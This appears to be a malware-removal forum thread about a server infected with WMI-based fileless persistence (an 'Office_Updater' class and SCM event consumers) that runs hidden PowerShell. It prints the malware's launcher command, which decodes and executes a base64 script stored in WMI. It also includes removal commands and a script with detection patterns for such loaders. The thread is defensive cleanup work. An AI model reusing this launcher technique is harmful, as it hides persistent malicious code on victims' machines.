Malzuko

Powershell running hidden script consuming 70% of cpu


Hello

I have been having an issue with our server at work recently and can't get to the bottom of it. Two PowerShell windows keep opening in the background running a script, one of which is consuming a lot of CPU power. I can end the task or suspend the process but it always returns.

This machine hosts a domain and several users log into this server via Remote Desktop on the default port 3389.

 

These are the scripts - the first one is the one using 70% of the CPU, the second one always appears first.

 

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command  -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

 

powershell.exe -NoP -NonI -W Hidden -E [base64-encoded command omitted]

 

 

Attached logs: Addition.txt, FRST.txt, mb.txt, AdwCleaner[S1].txt, MyConsoleSettings.txt, MyScheduledTasks.txt


Hi Malzuko :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.

  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on Malwarebytes Forums, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against Malwarebytes Forums's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread


This being said, it's time to clean-up some malware, so let's get started, shall we? :)

Read the following:

https://forum.eset.com/topic/14143-powershell-script-100-cpu-load-malicious-attack/

Long story short, your server (and your network) have been compromised.

Did you delete the scheduled tasks that were launching these PowerShell scripts?


I ran these scripts as instructed about a week ago:

 

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Filter'" |remOVe-WMIObject  -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM Event Consumer'" | Remove-WMIObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%SCM Event Consumer%'" | REmOVE-WMIObject -Verbose
([WmiClass]'root\default:Win32_TaskService') | Remove-WMIObject -Verbose

Get-WMIObject -Namespace root\Subscription -Class  ActiveScriptEventConsumer -Filter "Name='SCM Event Consumer'" | Remove-WMIObject -Verbose

 

I ran them again today; the 3rd one comes back red but all the others return to the normal prompt. I believe when I ran them the first time, the first 2 commands returned with yellow text.

 

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Fil
ter'" |remOVe-WMIObject  -Verbose
PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM
 Event Consumer'" | Remove-WMIObject -Verbose
PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path L
IKE '%SCM Event Consumer%'" | REmOVE-WMIObject -Verbose
PS C:\Users\Administrator> ([WmiClass]'root\default:Win32_TaskService') | Remove-WMIObject -Verbose
Cannot convert value "root\default:Win32_TaskService" to type "System.Management.ManagementClass". Error: "Not found "
At line:1 char:1
+ ([WmiClass]'root\default:Win32_TaskService') | Remove-WMIObject -Verbose

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvalidCastToWMIClass

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class  ActiveScriptEventConsumer -Filter "Name='S
CM Event Consumer'" | Remove-WMIObject -Verbose
PS C:\Users\Administrator>

 

 - I also ran WMILister_23 - through the process of doing that, after a few screens it just kept saying possible embedded exe [ok]

  - I probably pushed [ok] 100 times - I ended up ending the task

 

 

DumptedScripts.txt


Can you try this command instead?

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs Filter'" | Remove-WMIObject  -Verbose ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject -Verbose

This one should go through.


No luck with that. I tried it when it was running and when I had ended the task on it.

This was the response running an administrator powershell:

 

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs
 Filter'" | Remove-WMIObject  -Verbose ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject -Verbose
Remove-WMIObject : The input object cannot be bound to any parameters for the command either because the command does
not take pipeline input or the input and its properties do not match any of the parameters that take pipeline input.
At line:1 char:106
+ ... ogs Filter'" | Remove-WMIObject  -Verbose ([WmiClass]'root\default:Office_Update ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (\\WIN-K9REC7QI4...nt Logs Filter":PSObject) [Remove-WmiObject], Parame
   terBindingException
    + FullyQualifiedErrorId : InputObjectNotBound,Microsoft.PowerShell.Commands.RemoveWmiObject

PS C:\Users\Administrator>


Try this, I think the way it was copy/pasted added too many spaces.

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs Filter'" | Remove-WMIObject -Verbose ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject -Verbose

 


Still no luck. Does it matter if the script is running? Because I have ended it until it appears again.

 

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs
 Filter'" | Remove-WMIObject -Verbose ([WmiClass]'root\default:Office_Updater') | Remove-WMIObject -Verbose
Remove-WMIObject : The input object cannot be bound to any parameters for the command either because the command does
not take pipeline input or the input and its properties do not match any of the parameters that take pipeline input.
At line:1 char:106
+ ... ogs Filter'" | Remove-WMIObject -Verbose ([WmiClass]'root\default:Office_Updater ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (\\WIN-K9REC7QI4...nt Logs Filter":PSObject) [Remove-WmiObject], Parame
   terBindingException
    + FullyQualifiedErrorId : InputObjectNotBound,Microsoft.PowerShell.Commands.RemoveWmiObject

PS C:\Users\Administrator>


Yoan,

First I would like to thank you for your help so far, it has been encouraging :)

I've been poking around in Sysinternals and discovered some more information that may or may not help.

A lot of the scheduled task entries and the PowerShell entry share the same 10/28/2014 timestamp.

Are these the scheduled tasks I need to delete?

 

 

[Attached screenshots: screenshot1.jpg, screenshot2.jpg]

 


Actually, simply delete the SCM Event Logs Consumer. It should do the trick. I'll see if I can find an easy way for you to delete the whole Office_Updater class.


Now, if you restart the server (if you're able to), are the processes still present?


I will have to wait till after business hours to restart the server. I will do so as soon as I can.

 


Ok, I was able to restart the server. Since I deleted the SCM Event Logs Consumer entry, PowerShell has not opened. I will be monitoring it periodically throughout the night.

 


Awesome :) I'll look into the WMI stuff tomorrow. Let me know if it ever comes back in the meantime.


We are still looking good here, there has been no recurrence. Do you have any idea what this malware was doing?


Good! Can you run the WMI_Lister23 script again to generate a new DumpedScripts.txt log?


Maybe these commands will do the trick.

Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%SCM Event Logs Consumer%'" | Remove-WMIObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM Event Logs Consumer'" | Remove-WMIObject -Verbose
Get-WMIObject -Namespace root\DEFAULT -Class Office_Updater | Remove-WMIObject -Verbose ([WmiClass]'root\DEFAULT:Office_Updater') | Remove-WMIObject -Verbose

 


Alright, I ran those - I marked the one that returned yellow with the orange text. I also ran WMILister again.

DumptedScripts.txt

 

 

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path L
IKE '%SCM Event Logs Consumer%'" | Remove-WMIObject -Verbose
VERBOSE: Performing the operation "Remove-WmiObject" on target
"\\WIN-K9REC7QI4JS\ROOT\Subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"SCM Event Logs
 Consumer\"",Filter="__EventFilter.Name=\"SCM Event Logs Filter\""".

PS C:\Users\Administrator> Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM
 Event Logs Consumer'" | Remove-WMIObject -Verbose
PS C:\Users\Administrator> Get-WMIObject -Namespace root\DEFAULT -Class Office_Updater | Remove-WMIObject -Verbose ([Wmi
Class]'root\DEFAULT:Office_Updater') | Remove-WMIObject -Verbose
PS C:\Users\Administrator>


Alright so the only thing left to remove is root\DEFAULT:Office_Updater... Ever used wbemtest.exe? I think it would be the easiest way. Launch it, connect to root\DEFAULT, click on the Enumerate Classes button, check the Recursive option, enter nothing in the Superclass field and click on Ok. From there, find Office_Updater and delete it.

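As an added example that is not from this thread or from any tool mentioned in it: the script below does in PowerShell what the thread did by hand. It lists every permanent event subscription in root\subscription together with its consumer command line, flags the loader patterns seen in the original command lines (-W Hidden, -E, iex, FromBase64String), and with -Remove deletes the binding, consumer and filter by name and then the payload-carrying class through its class object, which is the step Remove-WmiObject could not do because the class has no instances. The three default names are the ones from this thread; everything else (parameter names, the indicator list) is assumed.

```powershell
# Added example, not from the thread: audit WMI permanent event subscriptions and,
# with -Remove, delete the named filter/consumer/binding set plus the payload class.
# Default names are the ones seen in this thread; the indicator list is an assumption.
param(
    [string]$FilterName   = 'SCM Event Logs Filter',
    [string]$ConsumerName = 'SCM Event Logs Consumer',
    [string]$PayloadClass = 'Office_Updater',   # static class under root\default
    [switch]$Remove                              # audit only unless given
)
$ns = 'root\subscription'

# Index filters and consumers by __RELPATH; a binding references both by that key.
$filters = @{};   Get-WmiObject -Namespace $ns -Class __EventFilter   | ForEach-Object { $filters[$_.__RELPATH]   = $_ }
$consumers = @{}; Get-WmiObject -Namespace $ns -Class __EventConsumer | ForEach-Object { $consumers[$_.__RELPATH] = $_ }

# Strings that, in a consumer command line or script body, usually mean a hidden PowerShell loader.
$suspect = 'EncodedCommand|-E\s|-EC\s|FromBase64String|Invoke-Expression|\biex\b|-W Hidden'

foreach ($b in Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding) {
    $f = $filters[$b.Filter]; $c = $consumers[$b.Consumer]
    # CommandLineEventConsumer carries CommandLineTemplate, ActiveScriptEventConsumer carries ScriptText
    $cmd = "$($c.CommandLineTemplate)$($c.ScriptText)"
    [pscustomobject]@{
        Filter     = $f.Name
        Query      = $f.Query
        Consumer   = $c.Name
        Command    = $cmd
        Suspicious = [bool]($cmd -match $suspect)
    }
}

if (-not $Remove) { return }

# Remove in dependency order: binding first, then consumer, then filter.
Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
    Where-Object { $_.Consumer -like "*$ConsumerName*" } | Remove-WmiObject -Verbose
Get-WmiObject -Namespace $ns -Class __EventConsumer |
    Where-Object { $_.Name -eq $ConsumerName } | Remove-WmiObject -Verbose
Get-WmiObject -Namespace $ns -Class __EventFilter -Filter "Name='$FilterName'" | Remove-WmiObject -Verbose

# The payload class has no instances, so piping Get-WmiObject instances into Remove-WmiObject
# removes nothing. -List returns the ManagementClass itself, whose Delete() drops the class definition.
$cls = Get-WmiObject -Namespace 'root\default' -List -Class $PayloadClass
if ($cls) { $cls.Delete(); Write-Host "Deleted class root\default:$PayloadClass" }
else      { Write-Host "Class root\default:$PayloadClass not present" }
```

Run it elevated; without -Remove it only reports, which is the mode to use first so the audit output can be kept as evidence before anything is deleted.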

Awesome! It does look clean indeed :) No traces of any rogue WMI entries left!

We can keep the thread open till tomorrow, just in case the infection returns, but I think we got it.

This topic is now closed to further replies.